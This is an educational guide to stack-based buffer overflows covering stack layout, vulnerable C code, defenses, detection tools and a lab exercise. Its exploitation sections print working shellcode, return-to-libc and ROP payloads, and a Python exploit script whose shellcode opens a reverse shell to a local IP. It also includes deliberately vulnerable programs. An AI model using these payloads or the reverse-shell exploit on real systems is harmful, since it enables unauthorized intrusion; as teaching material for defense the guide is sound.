Stack-Based Buffer Overflows
Understanding stack-based buffer overflows: how they work, exploitation techniques, and defensive measures.
Introduction to Stack-Based Buffer Overflows
Stack-based buffer overflows represent one of the most fundamental and historically significant classes of software vulnerabilities. Despite being well-understood for decades, they continue to appear in modern software due to the prevalence of memory-unsafe languages like C and C++. This comprehensive guide explores the mechanics, exploitation techniques, and defensive measures related to stack-based buffer overflows.
Understanding the Stack
Stack Fundamentals
The stack is a region of memory used for:
- Local variables: Function-scoped variables
- Function parameters: Arguments passed to functions
- Return addresses: Where to continue execution after function calls
- Saved registers: Preserved CPU state
Stack Layout (x86)
The stack grows downward (toward lower memory addresses):
Higher Memory Addresses
βββββββββββββββββββββββ
β Function Args β β [ebp + 8], [ebp + C], etc.
βββββββββββββββββββββββ€
β Return Address β β [ebp + 4]
βββββββββββββββββββββββ€
β Saved EBP β β [ebp] (frame pointer)
βββββββββββββββββββββββ€
β Local Variable 1 β β [ebp - 4]
βββββββββββββββββββββββ€
β Local Variable 2 β β [ebp - 8]
βββββββββββββββββββββββ€
β Buffer β β [ebp - 0x108] (vulnerable buffer)
βββββββββββββββββββββββ
Lower Memory Addresses
Vulnerable Code Patterns
Classic Example
#include <stdio.h>
#include <string.h>
void vulnerable_function(char* input) {
char buffer[256]; // Fixed-size buffer
strcpy(buffer, input); // No bounds checking!
printf("You entered: %s\n", buffer);
}
int main(int argc, char* argv[]) {
if (argc != 2) {
printf("Usage: %s <input>\n", argv[0]);
return 1;
}
vulnerable_function(argv[1]);
return 0;
}
Dangerous Functions
Common functions that can cause buffer overflows:
| Function | Risk | Safer Alternative |
|---|---|---|
strcpy() | No bounds checking | strncpy() or strlcpy() |
strcat() | No bounds checking | strncat() or strlcat() |
sprintf() | No bounds checking | snprintf() |
gets() | Never checks bounds | fgets() |
scanf("%s") | No bounds checking | scanf("%255s") |
Buffer Overflow Mechanics
Normal Function Execution
void function(char* input) {
char buffer[8]; // 8-byte buffer
strcpy(buffer, input);
}
// Normal input: "HELLO"
Memory Layout:
[buffer: "HELLO\x00\x00\x00"] [saved ebp] [return addr] [args...]
Buffer Overflow Condition
// Overflow input: "AAAAAAAABBBBCCCCDDDD"
Memory Layout:
[buffer: "AAAAAAAA"] [saved ebp: "BBBB"] [return addr: "CCCC"] [args: "DDDD"]
β
Overwritten return address!
Assembly Analysis
Let's examine the assembly code for our vulnerable function:
vulnerable_function:
push ebp ; Save frame pointer
mov ebp, esp ; Set up new frame
sub esp, 0x108 ; Allocate 264 bytes (256 + padding)
mov eax, [ebp+8] ; Get input parameter
mov [esp], eax ; Set up strcpy argument
lea eax, [ebp-0x108] ; Get buffer address
mov [esp+4], eax ; Set up strcpy destination
call strcpy ; Vulnerable call
mov esp, ebp ; Restore stack pointer
pop ebp ; Restore frame pointer
ret ; Return (potentially to attacker-controlled address)
Exploitation Techniques
Control Flow Hijacking
The primary goal is to overwrite the return address:
Step 1: Find the Offset
# Create a pattern to find exact offset
python -c "print('A' * 268 + 'BCDE')" > payload.txt
# Run under debugger
gdb ./vulnerable
(gdb) run $(cat payload.txt)
# Check EIP value
(gdb) info registers eip
eip: 0x45444342 # "BCDE" in little-endian
# Buffer is at offset 268 from return address
Step 2: Control Return Address
# Exploit payload structure
payload = "A" * 268 # Padding to reach return address
payload += "\xef\xbe\xad\xde" # New return address (0xdeadbeef)
# This will cause the program to jump to 0xdeadbeef
Shellcode Injection
Inject and execute arbitrary code:
Simple Shellcode (Linux x86)
# execve("/bin/sh", NULL, NULL) shellcode
shellcode = (
"\x31\xc0" # xor eax, eax
"\x50" # push eax
"\x68\x2f\x2f\x73\x68" # push 0x68732f2f ("/sh")
"\x68\x2f\x62\x69\x6e" # push 0x6e69622f ("/bin")
"\x89\xe3" # mov ebx, esp
"\x50" # push eax
"\x53" # push ebx
"\x89\xe1" # mov ecx, esp
"\xb0\x0b" # mov al, 0xb (sys_execve)
"\xcd\x80" # int 0x80
)
# Complete exploit
nop_sled = "\x90" * 100 # NOP sled for reliability
padding = "A" * (268 - len(nop_sled) - len(shellcode))
return_addr = "\x10\xf0\xff\xbf" # Address pointing into NOP sled
exploit = nop_sled + shellcode + padding + return_addr
Return-to-libc Attack
When the stack is non-executable, return to existing functions:
# Find function addresses
objdump -T /lib/libc.so.6 | grep system
objdump -T /lib/libc.so.6 | grep exit
# Find string "/bin/sh"
strings -a -t x /lib/libc.so.6 | grep "/bin/sh"
# Exploit payload
padding = "A" * 268
system_addr = "\x60\xb7\xe4\xb7" # Address of system()
exit_addr = "\x00\x96\xe4\xb7" # Address of exit()
binsh_addr = "\x0b\x8f\xf8\xb7" # Address of "/bin/sh"
exploit = padding + system_addr + exit_addr + binsh_addr
Exploitation Tools and Techniques
Pattern Generation
# Using Metasploit pattern tools
./pattern_create.rb -l 300
# GDB PEDA
gdb-peda$ pattern create 300
gdb-peda$ pattern offset 0x41384141
# Python script
def create_pattern(length):
pattern = ""
for i in range(length):
pattern += chr(65 + (i % 26)) # A-Z repeating
return pattern
Address Discovery
# Find function addresses in GDB
(gdb) print system
(gdb) print exit
(gdb) find 0xb7e00000, 0xb7f50000, "/bin/sh"
# Using ldd to find library base
ldd ./vulnerable
# Environment variable method
env - PWD=$PWD ./vulnerable $(python exploit.py)
Reliable Exploitation
#!/usr/bin/env python
import struct
import subprocess
def exploit():
# Shellcode (reverse shell to 192.168.1.100:4444)
shellcode = (
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66"
"\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0"
"\xa8\x01\x64\x68\x02\x00\x11\x5c\x89\xe1\xb0\x66\x50"
"\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73"
"\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0"
"\x0b\xcd\x80"
)
# Build exploit
buffer_size = 268
nop_sled = "\x90" * 100
# Calculate padding
payload_size = len(nop_sled) + len(shellcode)
padding = "A" * (buffer_size - payload_size)
# Return address (stack address + offset to NOP sled)
ret_addr = struct.pack("<I", 0xbffff000 + 200)
exploit = nop_sled + shellcode + padding + ret_addr
# Execute
subprocess.call(["./vulnerable", exploit])
if __name__ == "__main__":
exploit()
Defense Mechanisms
Stack Canaries
Compiler-inserted guards to detect stack corruption:
# Compile with stack protection
gcc -fstack-protector-all vulnerable.c -o vulnerable
# Generated assembly includes canary checks
function_start:
mov rax, QWORD PTR fs:0x28 ; Load canary
mov QWORD PTR [rbp-0x8], rax ; Store on stack
; ... function body ...
mov rax, QWORD PTR [rbp-0x8] ; Load stored canary
xor rax, QWORD PTR fs:0x28 ; Compare with original
je .L2 ; Jump if equal
call __stack_chk_fail ; Abort if mismatch
.L2:
leave
ret
Non-Executable Stack (NX/DEP)
Mark stack pages as non-executable:
# Compile with NX protection
gcc -Wl,-z,noexecstack vulnerable.c -o vulnerable
# Check NX bit
readelf -l vulnerable | grep GNU_STACK
# Runtime protection
execstack -q vulnerable # Query
execstack -s vulnerable # Set executable (disable protection)
execstack -c vulnerable # Clear executable (enable protection)
Address Space Layout Randomization (ASLR)
# System-wide ASLR control
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # Disable
echo 1 | sudo tee /proc/sys/kernel/randomize_va_space # Conservative
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space # Full
# Per-process ASLR
setarch x86_64 -R ./vulnerable # Disable for this execution
# Check randomization
ldd ./vulnerable # Run multiple times to see address changes
Advanced Exploitation Techniques
Return-Oriented Programming (ROP)
Chain existing code snippets (gadgets) to bypass NX:
# Find ROP gadgets
ROPgadget --binary ./vulnerable
# Example ROP chain
gadget1 = 0x08048384 # pop eax; ret
gadget2 = 0x08048392 # pop ebx; ret
gadget3 = 0x080483a0 # int 0x80; ret
# Build ROP chain for execve("/bin/sh", NULL, NULL)
rop_chain = [
gadget1, # pop eax; ret
0x0b, # sys_execve
gadget2, # pop ebx; ret
binsh_addr, # "/bin/sh"
gadget3, # int 0x80; ret
]
exploit = padding + b"".join(struct.pack("<I", addr) for addr in rop_chain)
Bypassing Stack Canaries
- Information leak: Read canary value before overwriting
- Brute force: Guess canary byte by byte (forking servers)
- Partial overwrite: Overwrite saved frame pointer only
- Exception handler: Overwrite SEH records on Windows
ASLR Bypass Techniques
- Information disclosure: Leak addresses from memory
- Partial overwrite: Modify only lower address bytes
- Return-to-PLT: Use procedure linkage table addresses
- JIT spray: Control JIT compiler output
Secure Coding Practices
Safe String Functions
// Instead of strcpy
char dest[256];
strncpy(dest, src, sizeof(dest) - 1);
dest[sizeof(dest) - 1] = '\0';
// Better: use strlcpy if available
strlcpy(dest, src, sizeof(dest));
// Or use safe string libraries
#include <bsd/string.h> // BSD string functions
Input Validation
int safe_copy(char* dest, size_t dest_size, const char* src) {
if (!dest || !src || dest_size == 0) {
return -1; // Invalid parameters
}
size_t src_len = strlen(src);
if (src_len >= dest_size) {
return -1; // Source too large
}
strcpy(dest, src); // Now safe
return 0;
}
Compiler Security Features
# Recommended compilation flags
gcc -fstack-protector-strong \ # Stack canaries
-D_FORTIFY_SOURCE=2 \ # Runtime checks
-Wformat-security \ # Format string warnings
-fPIE -pie \ # Position independent executable
-Wl,-z,relro \ # Read-only relocations
-Wl,-z,now \ # Immediate binding
-Wl,-z,noexecstack \ # Non-executable stack
program.c -o program
Detection and Analysis
Static Analysis
# Flawfinder - scan for vulnerable functions
flawfinder vulnerable.c
# Cppcheck - static analysis
cppcheck --enable=all vulnerable.c
# Clang static analyzer
clang --analyze vulnerable.c
Dynamic Analysis
# Valgrind memory error detection
valgrind --tool=memcheck ./vulnerable input
# AddressSanitizer
gcc -fsanitize=address -g vulnerable.c -o vulnerable
./vulnerable input
# GDB with plugins
gdb-peda ./vulnerable
gdb-gef ./vulnerable
Fuzzing
# AFL++ fuzzing
afl-gcc vulnerable.c -o vulnerable-afl
mkdir inputs outputs
echo "test" > inputs/seed
afl-fuzz -i inputs -o outputs ./vulnerable-afl @@
# LibFuzzer
clang -fsanitize=fuzzer,address vulnerable.c -o vulnerable-fuzz
./vulnerable-fuzz
Real-World Examples
Historical Vulnerabilities
- Morris Worm (1988): Exploited fingerd buffer overflow
- Code Red (2001): IIS buffer overflow in indexing service
- Slammer (2003): SQL Server buffer overflow
- Conficker (2008): Windows Server Service buffer overflow
Modern Mitigations in Practice
Despite decades of awareness, buffer overflows still occur:
- Legacy code: Old software with minimal security features
- Embedded systems: Resource constraints limit protections
- Kernel code: Lower-level code with fewer protections
- Custom protocols: Network parsing code vulnerabilities
Hands-On Lab Exercise
Vulnerable Program
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void secret_function() {
printf("Congratulations! You've gained control!\n");
system("/bin/sh");
}
void vulnerable_function(char* input) {
char buffer[64];
printf("Buffer is at: %p\n", buffer);
strcpy(buffer, input);
printf("Input copied: %s\n", buffer);
}
int main(int argc, char* argv[]) {
printf("Secret function is at: %p\n", secret_function);
if (argc != 2) {
printf("Usage: %s <input>\n", argv[0]);
return 1;
}
vulnerable_function(argv[1]);
printf("Program completed normally.\n");
return 0;
}
Lab Tasks
- Compile without protections:
gcc -fno-stack-protector -z execstack -no-pie lab.c -o lab - Find the buffer overflow: Identify vulnerable function
- Calculate offset: Determine bytes needed to overwrite return address
- Redirect execution: Jump to secret_function
- Enable protections: Recompile with security features and observe differences
Conclusion
Stack-based buffer overflows remain a critical vulnerability class that every security professional must understand. While modern defense mechanisms have significantly raised the bar for exploitation, they have not eliminated the threat entirely.
Key takeaways from this comprehensive analysis:
- Understanding is crucial: Knowing how attacks work enables better defense
- Defense in depth: Multiple protection layers are essential
- Secure coding practices: Prevention is better than mitigation
- Continuous vigilance: Security requires ongoing attention and updates
- Evolution continues: Both attack and defense techniques constantly evolve
As software systems become more complex, the fundamental principles of memory safety become even more important. Whether you're a developer writing secure code, a security analyst hunting for vulnerabilities, or a system administrator implementing defenses, understanding buffer overflows provides essential knowledge for building and maintaining secure systems.
The techniques covered in this guide provide a foundation for understanding both historical and modern exploitation methods, as well as the defensive measures that have evolved to counter them. Remember that with great knowledge comes great responsibilityβuse this information ethically and only for legitimate security research and defense.